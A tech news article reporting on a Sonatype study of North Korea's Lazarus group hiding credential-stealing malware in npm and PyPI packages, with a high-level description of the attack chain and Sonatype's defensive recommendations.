UPDATED 06:00 EDT / JULY 30 2025

SECURITY

Lazarus turns open source into a weapon in its latest global espionage push

A new report out today from software supply chain security firm Sonatype Inc. details how the infamous North Korea-backed hacking group Lazarus has intensified its cyber espionage operations by embedding sophisticated malware into open-source packages.

The report details that Sonatype detected and blocked 234 unique malicious packages tied to Lazarus between January and July this year, with more than 36,000 potential developer victims globally.

Lazarus needs little introduction to those who follow cybersecurity, since has been around for many years. Some of the group’s best-known attacks include the 2014 Sony breach and the 2017 WannaCry ransomware campaign.

Like many similar groups, Lazarus over the years has shifted tactics. Today, instead of simply attacking financial institutions directly, the group has become more sneaky by targeting developers and deployment environments. It plants malware in widely used open-source repositories such as npm and PyPI. The malicious packages from Lazarus are designed to mimic trusted libraries, often through typosquatting or combo-squatting, to trick developers into unknowingly installing backdoors into their systems.

In one example, Lazarus used a malicious vite-postcss-helper npm package that includes a multi-stage attack chain that starts with a dropper that contacts a command-and-control server to fetch an obfuscated loader. The loader deploys multiple stealthy payloads, including a clipboard stealer, a credential harvester dubbed “BeaverTail,” a broad file exfiltrator and a Windows-specific keylogger and screenshot tool. More than 90 packages were designed specifically for secrets exfiltration, indicating that the intent of the campaign is espionage and long-term infiltration rather than making money.

The Lazarus campaign leverages the trust many have with open-source packages used in modern development pipelines. Since package installations are often automated and poorly scrutinized, attackers can reach massive scale with minimal visibility, all while often remaining under the radar.

Because of the methodology — sneaking the malicious code into the open-source codebase — the malicious components can persist undetected for months inside build systems and developer machines, harvesting credentials, application programming interface tokens and source code access.

Sonatype warns that the trend reflects a broader evolution in cyberthreats: Nation-state actors are now embedding themselves directly into the software development lifecycle, rather than simply attacking potential targets directly.

The report makes a number of recommendations that SecOps and DevSecOps teams can implement to mitigate risks. They include adopting a layered defense strategy to secure the software supply chain and deploying a repository firewall to block suspicious or malicious packages before they reach build systems. Sonatype also urges security teams to monitor for unusual post-installation behavior, such as shell execution or remote script retrieval.

Image: SiliconANGLE/Reve

A message from John Furrier, co-founder of SiliconANGLE:

Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.

  • 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
  • 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.

Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.